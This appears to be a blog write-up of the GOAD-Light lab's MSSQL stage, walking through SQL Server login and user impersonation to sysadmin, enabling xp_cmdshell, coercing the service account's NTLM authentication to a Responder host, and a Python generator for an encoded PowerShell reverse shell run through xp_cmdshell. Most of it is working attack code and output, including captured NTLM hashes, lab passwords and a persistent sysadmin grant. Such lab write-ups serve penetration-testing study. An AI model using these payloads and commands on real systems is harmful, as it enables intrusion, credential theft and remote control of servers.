GOAD-Light-Part6-MSSQL

(figure: GOAD-Light schema)

Because my environment is not the full GOAD, I cannot do the ADCS exploitation lab, so I am skipping ahead to the next part: MSSQL.

Pull the latest GOAD and re-run:

```
ansible-playbook servers.yml
```

to get the current mssql configuration. The relevant changes are:

  • arya.stark is granted EXECUTE AS USER / IMPERSONATE on the dbo user of the msdb database
  • brandon.stark is granted IMPERSONATE on the jon.snow login

Enumerating MSSQL servers

Impacket GetUserSPNs.py

```
impacket-GetUserSPNs north.sevenkingdoms.local/brandon.stark:iseedeadpeople
```

```
┌──(kali㉿kali)-[~/GOAD/mssql]
└─$ impacket-GetUserSPNs north.sevenkingdoms.local/brandon.stark:iseedeadpeople
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

ServicePrincipalName                                 Name         MemberOf                                                    PasswordLastSet             LastLogon                   Delegation
---------------------------------------------------  -----------  ----------------------------------------------------------  --------------------------  --------------------------  -----------
HTTP/eyrie.north.sevenkingdoms.local                 sansa.stark  CN=Stark,CN=Users,DC=north,DC=sevenkingdoms,DC=local        2026-01-19 10:52:54.806231
CIFS/winterfell.north.sevenkingdoms.local            jon.snow     CN=Night Watch,CN=Users,DC=north,DC=sevenkingdoms,DC=local  2026-01-19 10:53:07.368009  2026-01-23 03:20:13.241743  constrained
HTTP/thewall.north.sevenkingdoms.local               jon.snow     CN=Night Watch,CN=Users,DC=north,DC=sevenkingdoms,DC=local  2026-01-19 10:53:07.368009  2026-01-23 03:20:13.241743  constrained
MSSQLSvc/castelblack.north.sevenkingdoms.local       sql_svc                                                                  2026-01-19 10:53:16.602142  2026-01-24 01:50:13.774423
MSSQLSvc/castelblack.north.sevenkingdoms.local:1433  sql_svc                                                                  2026-01-19 10:53:16.602142  2026-01-24 01:50:13.774423
```

The two MSSQLSvc SPNs tell us that castelblack hosts the SQL Server instance (port 1433) and that it runs under the domain account sql_svc.

Nmap

```
nmap -p 1433 -sV -sC 192.168.56.10-22
```

(screenshot)

CrackMapExec

```
crackmapexec mssql 192.168.56.22
```

(screenshot)

We can try the user samwell.tarly:

```
crackmapexec mssql 192.168.56.22 -u samwell.tarly -p Heartsbane -d north.sevenkingdoms.local
```

(screenshot)

As we can see, this account has access to the database.

Connecting to the database

```
impacket-mssqlclient -windows-auth north.sevenkingdoms.local/samwell.tarly:Heartsbane@castelblack.north.sevenkingdoms.local
```

(screenshot)

help lists the available commands:

```
lcd {path}                 - changes the current local directory to {path}
exit                       - terminates the server process (and this session)
enable_xp_cmdshell         - you know what it means
disable_xp_cmdshell        - you know what it means
enum_db                    - enum databases
enum_links                 - enum linked servers
enum_impersonate           - check logins that can be impersonated
enum_logins                - enum login users
enum_users                 - enum current db users
enum_owner                 - enum db owner
exec_as_user {user}        - impersonate with execute as user
exec_as_login {login}      - impersonate with execute as login
xp_cmdshell {cmd}          - executes cmd using xp_cmdshell
xp_dirtree {path}          - executes xp_dirtree on the path
sp_start_job {cmd}         - executes cmd using the sql server agent (blind)
use_link {link}            - linked server to use (set use_link localhost to go back to local or use_link .. to get back one step)
! {cmd}                    - executes a local shell cmd
upload {from} {to}         - uploads file {from} to the SQLServer host {to}
download {from} {to}       - downloads file from the SQLServer host {from} to {to}
show_query                 - show query
mask_query                 - mask query
```

Enumeration

```
enum_logins
```

(screenshot)

Impersonation

Let's enumerate the impersonation possibilities:

```
enum_impersonate
```

This runs the following query:

```sql
SELECT 'LOGIN' as 'execute as','' AS 'database',
pe.permission_name, pe.state_desc,pr.name AS 'grantee', pr2.name AS 'grantor'
FROM sys.server_permissions pe
JOIN sys.server_principals pr ON pe.grantee_principal_id = pr.principal_Id
JOIN sys.server_principals pr2 ON pe.grantor_principal_id = pr2.principal_Id WHERE pe.type = 'IM'
```

which lists every login that holds an IMPERSONATE permission (grantee) together with the login that granted it (grantor).

It then runs the following against each database:

```sql
use <db>;
SELECT 'USER' as 'execute as', DB_NAME() AS 'database',
pe.permission_name,pe.state_desc, pr.name AS 'grantee', pr2.name AS 'grantor'
FROM sys.database_permissions pe
JOIN sys.database_principals pr ON pe.grantee_principal_id = pr.principal_Id
JOIN sys.database_principals pr2 ON pe.grantor_principal_id = pr2.principal_Id WHERE pe.type = 'IM'
```

which lists every database user that holds an IMPERSONATE permission.

| | Login | User |
|---|---|---|
| Level | SQL Server instance | database |
| Purpose | lets you connect to the server | lets you do things inside a database |
| Answers | "Can I get in?" | "What am I allowed to do?" |
| One-to-many? | yes: one login can map to a user in several databases | |

A SQL Server login is for authentication, a database user is for authorization. Authentication decides whether we may connect to the server at all; authorization decides which operations we may perform inside a database. Logins are created at the instance level, users at the database level, and one server login can be mapped to users in several different databases.
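To make the login/user split concrete, here is a T-SQL batch you can paste at the mssqlclient prompt. It is an added example, not part of the original post and not code from mssqlclient or GOAD. It reports the current identity at both levels, then lists the logins the current login may impersonate together with whether each target is sysadmin, and finally takes the path and reverts. It assumes the GOAD-Light state the page describes (samwell.tarly holds IMPERSONATE on the sa login; run as brandon.stark the same batch shows jon.snow instead, whom the page identifies as sysadmin). One difference from the enum_impersonate query above: that query prints the grantor of the permission, which in this lab happens to be sa because sa granted the right on itself; the principal you can actually impersonate is the one in pe.major_id, so this version joins on that column.

```sql
-- Added example, not from the original post. Assumes the GOAD-Light grants
-- described on the page; login names are those of the lab.

-- 1. Identity at both levels in the current database.
--    SYSTEM_USER  = server-level login  (authentication)
--    USER_NAME()  = database-level user mapped to that login (authorization)
SELECT SYSTEM_USER                  AS [login],
       USER_NAME()                  AS [db_user],
       DB_NAME()                    AS [database],
       IS_SRVROLEMEMBER('sysadmin') AS [is_sysadmin];

-- 2. Server level: every IMPERSONATE grant visible to us. For class 101
--    (SERVER_PRINCIPAL) pe.major_id is the principal_id of the login that may
--    be impersonated; pe.grantor_principal_id only records who granted it.
--    A low-privileged login sees only its own grants here; sa sees them all.
SELECT pr.name                                AS grantee,
       tgt.name                               AS impersonatable_login,
       IS_SRVROLEMEMBER('sysadmin', tgt.name) AS target_is_sysadmin,
       grantor.name                           AS granted_by
FROM sys.server_permissions pe
JOIN sys.server_principals pr      ON pe.grantee_principal_id = pr.principal_id
JOIN sys.server_principals tgt     ON pe.major_id             = tgt.principal_id
JOIN sys.server_principals grantor ON pe.grantor_principal_id = grantor.principal_id
WHERE pe.class = 101 AND pe.type = 'IM' AND pe.state = 'G';

-- 3. Take the path and prove it, then drop back. EXECUTE AS LOGIN swaps the
--    server-level token, so IS_SRVROLEMEMBER now answers for sa.
--    (As brandon.stark the target would be 'NORTH\jon.snow'.)
EXECUTE AS LOGIN = 'sa';
SELECT SYSTEM_USER AS now_running_as, IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;
REVERT;
```

Step 3 is exactly what mssqlclient's exec_as_login does; REVERT matters when you want to go back to your own context without reconnecting, for example to compare what each identity can see in step 2.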

(screenshot)

(screenshot)

samwell.tarly already holds IMPERSONATE on the sa login.

So we impersonate sa, enable xp_cmdshell and run a command:

```
exec_as_login sa
enable_xp_cmdshell
xp_cmdshell whoami
```

Behind the scenes mssqlclient runs:

```sql
execute as login='sa';
exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;
exec master..xp_cmdshell 'whoami'
```

(screenshot)

We are now running as the sa login.

Continue enumerating logins:

```
enum_logins
```

(screenshot)

Logged in as sa we see a lot more, including that jon.snow is a sysadmin on this instance.

Looking for other impersonation paths:

```
enum_impersonate
```

(screenshot)

As sysadmin (sa) we see every grant in the instance, including the other logins and users that hold impersonation rights.

Another way in is to log in as brandon.stark and EXECUTE AS LOGIN jon.snow, since jon.snow is sysadmin.

Impersonating a database user

We connect to the database as arya.stark:

```
impacket-mssqlclient -windows-auth north.sevenkingdoms.local/arya.stark:Needle@castelblack.north.sevenkingdoms.local
```

If we stay in the master database and impersonate the user dbo, we do not get a shell: enabling xp_cmdshell fails.

(screenshot)

But arya.stark also holds IMPERSONATE on the dbo user of the msdb database.

The difference between the two databases is that msdb has the TRUSTWORTHY property set (it is ON by default for msdb and OFF by default for every other database, master included).

(screenshot)

Because msdb is TRUSTWORTHY and its dbo maps to the database owner sa, the impersonated dbo token is honoured for server-level permission checks, and we get a shell:

(screenshot)
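The check behind that difference, as an added T-SQL example (not from the original post or from GOAD): which databases are both TRUSTWORTHY and owned by a sysadmin, which database users the current user may impersonate there, and what an impersonated dbo can then do at server level. It assumes the lab state the page describes (arya.stark holds IMPERSONATE on dbo in msdb; msdb is owned by sa). The three sp_configure/xp_cmdshell lines are what mssqlclient's enable_xp_cmdshell and xp_cmdshell run for you; the ALTER SERVER ROLE line is an added persistent variant.

```sql
-- Added example, not from the original post. Assumes the GOAD-Light grants
-- described on the page (arya.stark may impersonate dbo in msdb).

-- 1. Which databases would honour an impersonated dbo at server level?
--    Needs both: TRUSTWORTHY ON and an owner that is sysadmin (here: sa).
--    master has the sysadmin owner but TRUSTWORTHY OFF, hence no shell there.
SELECT d.name,
       SUSER_SNAME(d.owner_sid)                               AS owner_login,
       d.is_trustworthy_on,
       IS_SRVROLEMEMBER('sysadmin', SUSER_SNAME(d.owner_sid)) AS owner_is_sysadmin
FROM sys.databases d
ORDER BY d.is_trustworthy_on DESC, d.name;

-- 2. Database level: which users may the current user impersonate in msdb?
--    class 4 = DATABASE_PRINCIPAL; pe.major_id is the user being impersonated.
USE msdb;
SELECT USER_NAME()   AS current_db_user,
       tgt.name      AS impersonatable_user,
       tgt.type_desc AS target_type
FROM sys.database_permissions pe
JOIN sys.database_principals pr  ON pe.grantee_principal_id = pr.principal_id
JOIN sys.database_principals tgt ON pe.major_id             = tgt.principal_id
WHERE pe.class = 4 AND pe.type = 'IM' AND pe.state = 'G';

-- 3. Become dbo inside the trustworthy database. Because msdb is TRUSTWORTHY
--    and owned by sa, server-level permission checks for this token pass as
--    sa, so sp_configure (needs ALTER SETTINGS) succeeds. The same three
--    statements run from master fail.
EXECUTE AS USER = 'dbo';
SELECT USER_NAME() AS db_user, IS_SRVROLEMEMBER('sysadmin') AS acts_as_sysadmin;

EXEC master.dbo.sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC master.dbo.sp_configure 'xp_cmdshell', 1;          RECONFIGURE;
EXEC master..xp_cmdshell 'whoami';

-- Persistent variant: make our own login sysadmin so no impersonation is
-- needed next time (noisy: it appears in sys.server_role_members).
ALTER SERVER ROLE sysadmin ADD MEMBER [NORTH\arya.stark];
REVERT;
```

From the defender's side the control point is the IMPERSONATE grant on dbo (and db_owner membership) in any database that is TRUSTWORTHY and owned by a sysadmin login; the first query is a quick way to list those databases on an instance you are reviewing.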

Forced authentication or relay

  • MSSQL can also be used to force the server into an outbound NTLM authentication. The incoming connection comes from the account the SQL Server service runs as, not from the login that triggered it.
  • Any login can trigger it, even one with no privileges at all such as hodor.

Log in as hodor (no privileges):

```
impacket-mssqlclient -windows-auth north.sevenkingdoms.local/hodor:hodor@castelblack.north.sevenkingdoms.local
```

Start Responder:

```
python3 Responder.py -I eth1 -dv
```

Run xp_dirtree against a UNC path on the attacker host:

```sql
exec master.sys.xp_dirtree '\\192.168.56.107\demontlm',1,1
```

| Part | What it is | Role here |
|---|---|---|
| exec | T-SQL keyword | executes a stored procedure |
| master.sys.xp_dirtree | extended stored procedure | built-in directory tree listing |
| '\\192.168.56.107\demontlm' | UNC path | the attack vector: the server resolves it over SMB |
| 1,1 | parameters | depth, and whether to list files as well as directories |

Syntax: xp_dirtree 'path', depth, show_files; it lists the subdirectories (and files) under the given path.

Responder receives the connection:

```
[SMB] NTLMv1-SSP Client   : fe80::a971:cff2:d9a0:81f4
[SMB] NTLMv1-SSP Username : NORTH\eddard.stark
[SMB] NTLMv1-SSP Hash     : eddard.stark::NORTH:76F2232A218D609200000000000000000000000000000000:E71DECB2B13AD49E4CC4D13643D1C6756D10C8BE485614FB:507f26dbfe27c70f
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Meren.local
[*] [LLMNR] Poisoned answer sent to fe80::a971:cff2:d9a0:81f4 for name Meren
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Meren
[*] [MDNS] Poisoned answer sent to fe80::a971:cff2:d9a0:81f4 for name Meren.local
[*] [LLMNR] Poisoned answer sent to fe80::a971:cff2:d9a0:81f4 for name Meren
[*] [LLMNR] Poisoned answer sent to 192.168.56.11 for name Meren
[*] [MDNS] Poisoned answer sent to 192.168.56.11 for name Meren.local
[*] [MDNS] Poisoned answer sent to fe80::a971:cff2:d9a0:81f4 for name Meren.local
[SMB] NTLMv1-SSP Client   : fe80::a971:cff2:d9a0:81f4
[SMB] NTLMv1-SSP Username : NORTH\eddard.stark
[SMB] NTLMv1-SSP Hash     : eddard.stark::NORTH:1B78FDDCD511427700000000000000000000000000000000:1E963DFE51AEA4DB7FFCCE1EEB95EC7CD9BD3C30785D10D4:a4b748ba366fd5b4
[SMB] NTLMv2-SSP Client   : 192.168.56.22
[SMB] NTLMv2-SSP Username : NORTH\sql_svc
[SMB] NTLMv2-SSP Hash     : sql_svc::NORTH:d1d76598545477a4:4043ADCCA794822E1B8F76BC68A45ACC:010100000000000000E3CED4E58CDC015CD18809F0A1E2880000000002000800480059005200540001001E00570049004E002D00360052004D003700590034005400490050004900320004003400570049004E002D00360052004D00370059003400540049005000490032002E0048005900520054002E004C004F00430041004C000300140048005900520054002E004C004F00430041004C000500140048005900520054002E004C004F00430041004C000700080000E3CED4E58CDC0106000400020000000800300030000000000000000000000000300000CB56548D7557EACE26CB169770DA9E3DB75AFB9DD077CF4418ED3D97119D599C0A001000000000000000000000000000000000000900260063006900660073002F003100390032002E003100360038002E00350036002E003100300037000000000000000000
```

The entry that matters is the NTLMv2 one from 192.168.56.22 for NORTH\sql_svc: that is the SQL Server service account authenticating to our share because of xp_dirtree, even though we triggered it as hodor. The two NTLMv1 entries for NORTH\eddard.stark come from 192.168.56.11 and are a side effect of Responder poisoning LLMNR/mDNS lookups for the name "Meren" on that host, not of xp_dirtree.

The same trigger also works with ntlmrelayx in place of Responder.

Attack chain

1. A low-privileged user connects to MSSQL
2. Runs xp_dirtree against a UNC path on the attacker's SMB server
3. The SQL Server service account tries to authenticate to that SMB server
4. The attacker captures the service account's NTLM challenge/response
5. Relay it (to a host where SMB signing is not required) or crack it offline to gain higher privileges
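An added T-SQL example (not from the original post) of the same coercion using the other UNC-taking procedures that public can usually execute, preceded by a check of what the current login may call; this is what you reach for when xp_dirtree has been revoked. It assumes the page's listener at \\192.168.56.107\demontlm; the probe file name is illustrative and does not need to exist.

```sql
-- Added example, not from the original post. Listener address and share are
-- the page's (192.168.56.107, demontlm); point them at your Responder host.

-- 1. Which of the usual UNC-taking procedures may this login execute?
--    xp_dirtree, xp_fileexist and xp_subdirs are granted to public by default.
--    1 = allowed, 0 = denied, NULL = object not visible to this login.
SELECT 'xp_dirtree'   AS proc_name, HAS_PERMS_BY_NAME('master.sys.xp_dirtree',   'OBJECT', 'EXECUTE') AS can_exec
UNION ALL
SELECT 'xp_fileexist',              HAS_PERMS_BY_NAME('master.sys.xp_fileexist', 'OBJECT', 'EXECUTE')
UNION ALL
SELECT 'xp_subdirs',                HAS_PERMS_BY_NAME('master.sys.xp_subdirs',   'OBJECT', 'EXECUTE');

-- 2. Each of these makes the SQL Server service account (sql_svc in this lab)
--    open an SMB session to the UNC path; the login running them is irrelevant.
--    Any one of them is enough; all three are shown so you can fall back.
EXEC master.sys.xp_dirtree   '\\192.168.56.107\demontlm', 1, 1;
EXEC master.sys.xp_fileexist '\\192.168.56.107\demontlm\probe.txt';
EXEC master.sys.xp_subdirs   '\\192.168.56.107\demontlm';

-- 3. Once you hold sysadmin (see the impersonation sections above) you can
--    confirm which account authenticated outbound. This view needs
--    VIEW SERVER STATE, so a plain login such as hodor gets a permission error.
SELECT servicename, service_account FROM sys.dm_server_services;
```

Step 1 tells you in advance whether the coercion will work for the login you hold; step 3 is the post-escalation check that the captured NTLMv2 entry really belongs to the service identity rather than to some proxy account.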

Getting a full shell

We can already run commands on castelblack, but we want a fully interactive shell.

Script

```python
#!/usr/bin/env python3
# Generates a base64-encoded PowerShell reverse-shell one-liner that can be
# passed to powershell.exe with -enc (which expects UTF-16LE, base64-encoded).
import base64
import sys

if len(sys.argv) < 3:
    print('Usage: python3 %s <YOUR_IP> <PORT>' % sys.argv[0])
    print('Example: python3 %s 192.168.56.1 4444' % sys.argv[0])
    sys.exit(0)

ip = sys.argv[1]
port = sys.argv[2]

# Plain TCP reverse shell: read a line, run it with iex, send back the output.
# Doubled braces are literal braces inside the f-string.
payload = f"""
$c = New-Object System.Net.Sockets.TCPClient('{ip}',{port});
$s = $c.GetStream();
[byte[]]$b = 0..65535|%{{0}};
while(($i = $s.Read($b, 0, $b.Length)) -ne 0){{
    $d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);
    $sb = (iex $d 2>&1 | Out-String );
    $sb = ([text.encoding]::ASCII).GetBytes($sb + 'PS> ');
    $s.Write($sb,0,$sb.Length);
    $s.Flush()
}};
$c.Close()
"""

# Encode as UTF-16LE, then base64, which is what -enc expects
byte_payload = payload.encode('utf-16le')
b64_payload = base64.b64encode(byte_payload).decode()

print("\n" + "="*60)
print("PowerShell reverse shell command:")
print("="*60)
print(f"powershell -exec bypass -enc {b64_payload}")
print("="*60)
print(f"\nHint: first run on Kali: nc -lvnp {port}")
print("then run the command above on the target")
print("="*60)
```

```
python3 gen_ps_shell.py 192.168.56.107 4444
```

This prints the base64-encoded PowerShell command:

```
powershell -exec bypass -enc CgAkAGMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAG8AYwBrAGUAdABzAC4AVABDAFAAQwBsAGkAZQBuAHQAKAAnADEAOQAyAC4AMQA2ADgALgA1ADYALgAxADAANwAnACwANAA0ADQANAApADsACgAkAHMAIAA9ACAAJABjAC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsACgBbAGIAeQB0AGUAWwBdAF0AJABiACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwAKAHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwAuAFIAZQBhAGQAKAAkAGIALAAgADAALAAgACQAYgAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsACgAgACAAIAAgACQAZAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiACwAMAAsACAAJABpACkAOwAKACAAIAAgACAAJABzAGIAIAA9ACAAKABpAGUAeAAgACQAZAAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAKACAAIAAgACAAJABzAGIAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAYgAgACsAIAAnAFAAUwA+ACAAJwApADsACgAgACAAIAAgACQAcwAuAFcAcgBpAHQAZQAoACQAcwBiACwAMAAsACQAcwBiAC4ATABlAG4AZwB0AGgAKQA7AAoAIAAgACAAIAAkAHMALgBGAGwAdQBzAGgAKAApAAoAfQA7AAoAJABjAC4AQwBsAG8AcwBlACgAKQAKAA==
```

(screenshot)

Start a listener on Kali:

```
nc -lvnp 4444
```

Log in to the database, impersonate sa, enable xp_cmdshell, and run the command:

```
SQL (sa  dbo@master)> xp_cmdshell "powershell -exec bypass -enc CgAkAGMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAG8AYwBrAGUAdABzAC4AVABDAFAAQwBsAGkAZQBuAHQAKAAnADEAOQAyAC4AMQA2ADgALgA1ADYALgAxADAANwAnACwANAA0ADQANAApADsACgAkAHMAIAA9ACAAJABjAC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsACgBbAGIAeQB0AGUAWwBdAF0AJABiACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwAKAHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwAuAFIAZQBhAGQAKAAkAGIALAAgADAALAAgACQAYgAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsACgAgACAAIAAgACQAZAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiACwAMAAsACAAJABpACkAOwAKACAAIAAgACAAJABzAGIAIAA9ACAAKABpAGUAeAAgACQAZAAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAKACAAIAAgACAAJABzAGIAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAYgAgACsAIAAnAFAAUwA+ACAAJwApADsACgAgACAAIAAgACQAcwAuAFcAcgBpAHQAZQAoACQAcwBiACwAMAAsACQAcwBiAC4ATABlAG4AZwB0AGgAKQA7AAoAIAAgACAAIAAkAHMALgBGAGwAdQBzAGgAKAApAAoAfQA7AAoAJABjAC4AQwBsAG8AcwBlACgAKQAKAA=="
```

We get a shell. Because xp_cmdshell runs under the SQL Server service account, the shell has the identity that whoami reported earlier (sql_svc), not sa.

(screenshot)


GOAD-Light-Part6-MSSQL
http://xiaowu5.cn/2026/01/24/GOAD-Light-Part6-MSSQL/
Author: 5
Published: 24 January 2026
License: BY XIAOWU